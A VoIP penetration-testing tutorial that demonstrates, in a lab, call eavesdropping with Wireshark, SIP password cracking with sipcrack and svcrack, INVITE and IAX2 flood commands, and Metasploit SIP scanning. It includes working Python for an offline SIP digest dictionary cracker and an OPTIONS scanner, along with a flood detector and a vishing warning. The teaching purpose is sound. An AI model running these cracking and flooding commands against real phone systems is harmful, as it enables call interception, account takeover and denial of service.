VoIP Sniffing Cracking Phishing & Metasploit Testing Tutorial
This is the second part of our series on VoIP penetration testing and its security risks. VoIP (like wireless) deserves its own discussion because the exposure is high: call signalling, media and credentials usually travel over the same LAN as everything else. Below is a demonstration of VoIP attacks with several different tools; the operating system used for the demonstration was BackTrack 5 R2.
Sniffing on VoIP Network
Sniffing a VoIP network works exactly like sniffing any other network: the attacker has to be somewhere the packets pass (a hub, a mirrored switch port, or, on a switched LAN, a position obtained by ARP spoofing). I will use some of the best-known tools to demonstrate the attack, starting with Wireshark, which can capture and decode VoIP traffic. Suppose two extensions are busy talking to each other and an attacker on the same segment captures the traffic in order to recover their conversation.
Wireshark has now captured some traffic. As discussed in the protocol section of the first part, SIP carries the signalling and RTP carries the actual audio. The question is: how do we extract the conversation from these packets? Wireshark has a built-in VoIP feature for this. Open the Telephony menu and choose VoIP Calls. You will then get this window:
Select the call, click Player, then Decode. You are now able to listen to the conversation, and Wireshark can save the decoded audio to a file. This works only because the RTP stream is sent in the clear; if the endpoints used SRTP, the player would produce nothing but noise.
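What the Wireshark player does before it decodes the codec is group RTP packets by SSRC, put them back in sequence-number order and concatenate the payloads. The following is an added example, not code from the original article or from Wireshark; it parses the RTP fixed header (RFC 3550), reassembles a stream while handling the 16-bit sequence wraparound, and counts lost packets. The sample packets, the SSRC 0xDEADBEEF and the `make_rtp` helper are constructed here for the demo.

```python
import struct
from typing import NamedTuple


class RtpPacket(NamedTuple):
    version: int
    payload_type: int
    marker: bool
    sequence: int
    timestamp: int
    ssrc: int
    payload: bytes


def parse_rtp(data: bytes) -> RtpPacket:
    """Parse a raw RTP packet: RFC 3550 fixed header, optional CSRC list,
    optional header extension and optional trailing padding."""
    if len(data) < 12:
        raise ValueError("too short for an RTP header")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", data[:12])
    version = b0 >> 6
    if version != 2:
        raise ValueError(f"unexpected RTP version {version}")
    padding = bool(b0 & 0x20)
    extension = bool(b0 & 0x10)
    cc = b0 & 0x0F                      # number of 32-bit CSRC identifiers
    marker = bool(b1 & 0x80)
    payload_type = b1 & 0x7F
    offset = 12 + 4 * cc
    if extension:
        if len(data) < offset + 4:
            raise ValueError("truncated extension header")
        ext_words = struct.unpack("!H", data[offset + 2:offset + 4])[0]
        offset += 4 + 4 * ext_words
    end = len(data)
    if padding:
        pad = data[-1]                  # last byte says how many padding bytes there are
        if pad == 0 or pad > end - offset:
            raise ValueError("bad padding length")
        end -= pad
    return RtpPacket(version, payload_type, marker, seq, ts, ssrc, data[offset:end])


def reassemble_streams(packets):
    """Group packets by SSRC, order them by sequence number and join the payloads.
    Returns {ssrc: {"payload_type": pt, "audio": bytes, "lost": n}}."""
    by_ssrc = {}
    for raw in packets:
        pkt = parse_rtp(raw)
        by_ssrc.setdefault(pkt.ssrc, []).append(pkt)
    out = {}
    for ssrc, pkts in by_ssrc.items():
        base = pkts[0].sequence
        # signed 16-bit distance from the first packet seen, so a stream that
        # wraps from 0xFFFF to 0x0000 still sorts correctly
        pkts.sort(key=lambda p: ((p.sequence - base + 0x8000) & 0xFFFF) - 0x8000)
        audio, seen, lost, prev = bytearray(), set(), 0, None
        for p in pkts:
            if p.sequence in seen:      # drop duplicates / retransmits
                continue
            seen.add(p.sequence)
            if prev is not None:
                lost += (p.sequence - prev - 1) & 0xFFFF
            prev = p.sequence
            audio += p.payload
        out[ssrc] = {"payload_type": pkts[0].payload_type, "audio": bytes(audio), "lost": lost}
    return out


def make_rtp(seq, ts, ssrc, payload, pt=0, marker=False):
    """Build a minimal RTP packet; only used to construct sample traffic for this demo."""
    b0 = 0x80                           # version 2, no padding, no extension, no CSRCs
    b1 = (0x80 if marker else 0) | (pt & 0x7F)
    return struct.pack("!BBHII", b0, b1, seq, ts, ssrc) + payload


# Constructed sample: three PCMU (payload type 0) packets captured out of order,
# crossing the sequence wraparound, with sequence 0x0000 never captured.
SAMPLE = [
    make_rtp(0xFFFF, 160, 0xDEADBEEF, b"\xff" * 4, marker=True),
    make_rtp(0x0001, 480, 0xDEADBEEF, b"\x7f" * 4),
    make_rtp(0xFFFE, 0, 0xDEADBEEF, b"\x00" * 4),
]

if __name__ == "__main__":
    for ssrc, s in reassemble_streams(SAMPLE).items():
        print(f"SSRC {ssrc:08x} PT {s['payload_type']}: {len(s['audio'])} bytes, {s['lost']} lost")
```

The reassembled bytes are still codec frames (G.711 mu-law for payload type 0); decoding them to PCM is the step Wireshark's Decode button performs.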
SIP Authentication Cracking (VoIP Cracking)
The importance of passwords needs no explanation, so in this section I will show how to crack the password of an extension (user) on a VoIP network. This is the most dangerous of the attacks here: if an attacker knows your password, he or she can register with the PBX under your identity and make and receive calls as you. The Wireshark capture can be used for authentication cracking. SIP uses HTTP-style digest authentication, so the REGISTER request carries an MD5 digest computed from the password, the realm, the server's nonce and the request URI rather than the password itself; an attacker who captures that exchange can test candidate passwords offline. Save the capture as a .pcap file; we will now use a tool called SIPcrack. It consists of two programs: sipdump, which extracts the authentication data (username, realm, nonce, URI and response) from the capture into a dump file, and sipcrack, which runs a wordlist against those hashes.
root@bt:~/Desktop/SIPcrack# ./sipdump pass.txt -p aa.pcap
SIPdump 0.3pre ( MaJoMu | www.codito.de )
---------------------------------------
* Using pcap file 'aa.pcap' for sniffing
* Starting to sniff with packet filter 'tcp or udp'
* Dumped login from 192.168.1.9 -> 192.168.1.3 (User: '600')
Exiting, sniffed 1 logins
sipcrack takes the dump file written by sipdump and a wordlist (the -w option). Each candidate password is hashed exactly the way the phone did and compared with the captured response; on a match it prints the password. Because this is an offline attack, nothing is sent to the PBX and nothing appears in its logs.
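To make clear what sipdump and sipcrack actually do, here is an added example (not part of the original article and not SIPcrack's own code) that parses the Authorization header out of a captured REGISTER and runs a wordlist against it using the SIP digest formula from RFC 3261 section 22.4. The REGISTER message, the realm "asterisk", the nonce and the wordlist are constructed for the demo; because no real capture is available, the response value is generated from the known password "12345" so the run is reproducible.

```python
import hashlib
import re
from typing import Iterable, Optional


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def sip_digest_response(username, realm, password, method, uri, nonce,
                        qop=None, nc=None, cnonce=None) -> str:
    """Digest response as a SIP phone computes it (RFC 2617 via RFC 3261 22.4).
    Asterisk-era challenges normally carry no qop, so the short form applies."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop:
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


_KV = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')   # key="quoted" or key=token


def parse_authorization(message: str) -> dict:
    """Return the Digest parameters (plus the request method) from a SIP request,
    which is the part of sipdump's job that matters for cracking."""
    lines = message.splitlines()
    method = lines[0].split()[0]
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() in ("authorization", "proxy-authorization"):
            value = value.strip()
            if not value.lower().startswith("digest"):
                raise ValueError("not a Digest credential")
            params = {k: q or u for k, q, u in _KV.findall(value.split(None, 1)[1])}
            params["method"] = method
            return params
    raise ValueError("no Authorization header found")


def crack(params: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the response for each candidate."""
    target = params["response"].lower()
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        guess = sip_digest_response(params["username"], params["realm"], candidate,
                                    params["method"], params["uri"], params["nonce"],
                                    params.get("qop"), params.get("nc"), params.get("cnonce"))
        if guess == target:
            return candidate
    return None


# Constructed sample: extension 600 registering with the PBX at 192.168.1.9.
# The response is derived from the known password "12345" purely for reproducibility.
_NONCE = "0b5c2d1e"
_RESPONSE = sip_digest_response("600", "asterisk", "12345", "REGISTER", "sip:192.168.1.9", _NONCE)
SAMPLE_REGISTER = (
    "REGISTER sip:192.168.1.9 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.3:5060;branch=z9hG4bK-1\r\n"
    "From: <sip:600@192.168.1.9>;tag=1\r\n"
    "To: <sip:600@192.168.1.9>\r\n"
    "Call-ID: 1@192.168.1.3\r\n"
    "CSeq: 2 REGISTER\r\n"
    f'Authorization: Digest username="600", realm="asterisk", nonce="{_NONCE}", '
    f'uri="sip:192.168.1.9", response="{_RESPONSE}", algorithm=MD5\r\n'
    "Content-Length: 0\r\n\r\n"
)
WORDLIST = ["password", "1234", "12345", "admin"]   # constructed stand-in for list.txt

if __name__ == "__main__":
    creds = parse_authorization(SAMPLE_REGISTER)
    print(f"user {creds['username']}@{creds['realm']}: password = {crack(creds, WORDLIST)}")
```

The digest protects the password only as well as the password resists guessing: one capture is enough to try an unlimited number of candidates at MD5 speed, which is why numeric extension passwords such as 12345 fall instantly.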
Another useful tool for cracking SIP passwords is svcrack, part of the SIPVicious suite. Unlike sipcrack it works online: it sends REGISTER requests to the PBX and tries each password from the list against the given extension, so it is noisy, shows up in the PBX logs and can be stopped by an account lockout policy. Usage:
root@bt:/pentest/voip/sipvicious# ./svcrack.py -u600 -d list.txt 192.168.1.9
| Extension | Password |
------------------------
| 600       | 12345    |
Denial of Service Attack on VoIP Network
A denial of service (DoS) attack can make the VoIP network and its devices unusable. inviteflood is a tool that floods a target with SIP INVITE requests addressed to a given extension (user). Usage:
./inviteflood interface targetuser targetdomain floodtarget numberofpackets
./inviteflood eth0 600 192.168.1.3 192.168.1.3 200000
This is not a "ping of death" but a flood of SIP INVITEs: the target has to process and answer every one of them, so the phone or softphone is tied up (and may crash), and the user is unable to make or receive calls for as long as the flood lasts.
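On the defensive side, an INVITE flood is easy to spot: one source sends far more INVITEs per second than any caller could. The following is an added example (not from the original article or from inviteflood) of a sliding-window detector run over a constructed SIP log. The log format, the addresses, the one-second window and the threshold of 50 INVITEs are assumptions for the demo; the event tuples could equally come from a pcap or from the PBX's SIP debug output.

```python
from collections import defaultdict, deque


def detect_invite_flood(events, window_ms=1000, threshold=50):
    """events: (time_ms, src_ip, method) tuples in chronological order.
    A source is flagged the first time it has sent more than `threshold`
    INVITEs inside any sliding window of `window_ms`.
    Returns {src_ip: time_ms at which it was flagged}."""
    recent = defaultdict(deque)       # per-source timestamps inside the window
    alerts = {}
    for t, src, method in events:
        if method != "INVITE":        # OPTIONS keepalives, REGISTERs etc. are ignored
            continue
        q = recent[src]
        q.append(t)
        while t - q[0] > window_ms:   # slide the window forward
            q.popleft()
        if len(q) > threshold and src not in alerts:
            alerts[src] = t
    return alerts


def parse_line(line: str):
    """Parse one line of the constructed log: '<time_ms> <src_ip> <method> <request-uri>'."""
    t, src, method, _uri = line.split(None, 3)
    return int(t), src, method


def analyse(lines):
    events = sorted(parse_line(line) for line in lines)
    return detect_invite_flood(events)


# Constructed sample log: a legitimate caller placing three calls over a minute,
# the PBX's own OPTIONS keepalives, and an inviteflood run of 200 INVITEs in 0.4 s
# from 192.168.1.13 against extension 600 on 192.168.1.3.
SAMPLE_LOG = (
    [f"{t} 192.168.1.5 INVITE sip:601@192.168.1.3" for t in (0, 30000, 60000)]
    + [f"{t} 192.168.1.9 OPTIONS sip:600@192.168.1.3" for t in range(0, 120000, 10000)]
    + [f"{100000 + 2 * i} 192.168.1.13 INVITE sip:600@192.168.1.3" for i in range(200)]
)

if __name__ == "__main__":
    for src, t in analyse(SAMPLE_LOG).items():
        print(f"INVITE flood from {src} detected at t={t} ms")
```

A threshold of 50 per second is far above what a phone or a small PBX trunk generates, so the rule produces no false positives on the normal caller while flagging the flood within its first 0.1 s.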
iaxflood is a similar tool for the IAX2 protocol (Asterisk's inter-server trunking protocol, which runs on UDP port 4569); usage is very simple:
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets
A simple run looks like this:
root@bt:/pentest/voip/iaxflood# ./iaxflood 192.168.1.13 192.168.1.2 10000
Will flood port 4569 from port 4569 10000 times
We have IP_HDRINCL
Number of Packets sent:
Sent 10000
root@bt:/pentest/voip/iaxflood#
Metasploit on VoIP Penetration Testing
Metasploit has several auxiliary modules for VoIP networks. Here are the most useful ones for VoIP testing:
- auxiliary/scanner/sip/options (to find SIP-enabled devices)
- auxiliary/scanner/sip/enumerator (to enumerate valid extensions)
msf > use auxiliary/scanner/sip/options
msf auxiliary(options) > set RHOSTS 192.168.1.1/24
RHOSTS => 192.168.1.1/24
msf auxiliary(options) > run
[*] 192.168.1.3 sip:nobody@192.168.1.3 agent='WAcjCpW'
[*] 192.168.1.9 200 agent='Asterisk PBX 1.6.0.26-FONCORE-r78' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
[*] 192.168.1.9 200 agent='Asterisk PBX 1.6.0.26-FONCORE-r78' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(options) >
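The options module does nothing more exotic than send a SIP OPTIONS request over UDP and read the User-Agent/Server and Allow headers of whatever answers. The following is an added example (not the Metasploit module's code and not from the original article) that builds the request, parses the reply into the same agent/verbs fields the module prints, and wraps both in a single-host scan. The local address 192.168.1.100, the tag generation and the sample Asterisk reply are constructed for the demo; only the parser is exercised offline, `scan()` needs a live target.

```python
import re
import secrets
import socket


def build_options(target_ip: str, local_ip: str = "192.168.1.100", local_port: int = 5060) -> bytes:
    """Build a minimal, RFC 3261-valid OPTIONS request for the target."""
    tag = secrets.token_hex(4)
    return (
        f"OPTIONS sip:{target_ip} SIP/2.0\r\n"
        f"Via: SIP/2.0/UDP {local_ip}:{local_port};branch=z9hG4bK{tag};rport\r\n"
        "Max-Forwards: 70\r\n"
        f'From: "scan" <sip:scan@{local_ip}>;tag={tag}\r\n'
        f"To: <sip:{target_ip}>\r\n"
        f"Call-ID: {secrets.token_hex(8)}@{local_ip}\r\n"
        "CSeq: 1 OPTIONS\r\n"
        f"Contact: <sip:scan@{local_ip}:{local_port}>\r\n"
        "Accept: application/sdp\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode()


def parse_options_response(raw: bytes) -> dict:
    """Extract status, agent banner and supported methods from a SIP response."""
    lines = raw.decode(errors="replace").split("\r\n")
    m = re.match(r"SIP/2\.0 (\d{3}) (.*)", lines[0])
    if not m:
        raise ValueError(f"not a SIP response: {lines[0]!r}")
    info = {"status": int(m.group(1)), "reason": m.group(2), "agent": None, "verbs": []}
    for line in lines[1:]:
        if not line:                           # blank line ends the headers
            break
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name in ("user-agent", "server"):   # phones send User-Agent, PBXs usually Server
            info["agent"] = value
        elif name == "allow":
            info["verbs"] = [v.strip() for v in value.split(",") if v.strip()]
    return info


def scan(target_ip: str, port: int = 5060, timeout: float = 2.0):
    """Send one OPTIONS to target_ip:port and return the parsed reply, or None on silence."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_options(target_ip), (target_ip, port))
        data, _ = sock.recvfrom(4096)
    except socket.timeout:
        return None
    finally:
        sock.close()
    return parse_options_response(data)


# Constructed sample reply, modelled on the Asterisk banner seen in the msf output above.
SAMPLE_RESPONSE = (
    b"SIP/2.0 200 OK\r\n"
    b"Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bKabc;received=192.168.1.100\r\n"
    b'From: "scan" <sip:scan@192.168.1.100>;tag=abc\r\n'
    b"To: <sip:192.168.1.9>;tag=as1f2e3d\r\n"
    b"Call-ID: 1@192.168.1.100\r\n"
    b"CSeq: 1 OPTIONS\r\n"
    b"Server: Asterisk PBX 1.6.0.26-FONCORE-r78\r\n"
    b"Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO\r\n"
    b"Supported: replaces\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    r = parse_options_response(SAMPLE_RESPONSE)
    print(f"192.168.1.9 {r['status']} agent={r['agent']!r} verbs={', '.join(r['verbs'])!r}")
```

The banner is exactly the kind of detail a defender should suppress: Asterisk's version string tells an attacker which known bugs and default behaviours to try next, and an OPTIONS probe is answered even by hosts that would reject a REGISTER.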
VoIP Phishing
Security awareness is very important. Before concluding this article, I want to briefly discuss VoIP phishing (also called vishing). Phishing is not a new attack; it is old school, but it remains a threat because attackers use social engineering to trick a user before stealing his or her credentials. You have probably heard of email phishing, in which an attacker directs the victim to a fake page so that they enter their confidential information there. In the same fashion, an attacker can use a phone call, with a spoofed caller ID if needed, to obtain your credentials. Suppose someone receives a call or email like this:
"Hi, this is an urgent message from the network administrator. We have found a problem with your account, so please call back at XXXX-XXXX-XXX to verify your account." Typically, an unwary user will call back and the attacker will then ask for confidential information. You need to understand the risk, and educate the people around you.